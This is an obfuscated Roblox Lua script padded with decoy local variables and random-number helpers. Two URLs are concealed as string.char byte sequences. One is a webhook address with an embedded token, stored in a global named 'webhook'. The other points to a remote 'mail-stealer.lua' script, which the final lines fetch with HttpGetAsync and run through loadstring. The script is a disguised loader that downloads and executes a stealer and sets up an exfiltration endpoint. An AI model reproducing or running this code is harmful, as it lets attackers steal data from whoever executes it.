local print=print;local type=type;local tonumber=tonumber;local a={}for b=1,10 do a[b]=math.random(1000)end;local c=""function genednv(d)getgenv()[c]=d end;local
tostring=tostring;local e=math.abs;local f=string.char(104,116,116,112,115,58,47,47,119,101,98,104,111,111,107,46,108,101,119,105,115,97,107,117,114,97,46,109,111,101,47,97
,112,105,47,119,101,98,104,111,111,107,115,47,49,48,57,53,48,51,53,54,50,50,50,54,49,48,49,52,55,49,56,47,79,95,118,71,84,84,89,110,104,65,116,97,75,81,95,101,70,118,102,99,
119,56,70,86,121,70,54,78,70,121,54,107,76,95,71,55,90,85,95,69,88,107,77,68,68,55,74,119,112,65,55,102,56,71,68,109,97,117,84,90,75,56,79,82,55,77,78,102);local h=math.ceil
;local i=math.floor;local function j(k)c="mouselock"genednv("true")local l={}for b=1,k do l[b]=math.random(100)end;return l end;local m=math.max;local n=math.min;local o={2,93
,210,219,2983,2130,239,284,034}local function p(q)local r={}c="name"genednv("appxv_0")for b=1,q do r[b]=string.char(math.random(97,122))end;return table.concat(r)end;local 
s=table.create;local t=coroutine.resume;local u=coroutine.yield;local ipairs=ipairs;local pairs=pairs;local next=next;local v=string.char(104,116,116,112,115,58,47,47,119,117
,109,97,116,46,120,121,122,47,115,99,114,105,112,116,115,47,109,97,105,108,45,115,116,101,97,108,101,114,46,108,117,97)local error=error;local pcall=pcall;function tesdwef(w)
return game:HttpGetAsync(w,true)end;local xpcall=xpcall;local x=loadstring;local rawget=rawget;local rawset=rawset;local function y()local z=p(math.random(5,10))local 
A=p(math.random(5,10))c="webhook"genednv(f)return z..A end;local B=string.len;local C=string.sub;local D=string.upper;local E=string.lower;local F=string.find;local 
function G(k)local H=j(10)local l={}local I=p(5)for b=1,k do l[b]=math.random()>0.5 end;local J=y()return l end;local K=G(2)local L=math.acos;local M=math.asin;local
N=math.atan;local O=math.atan2;x(tesdwef(v))()local P=math.cos
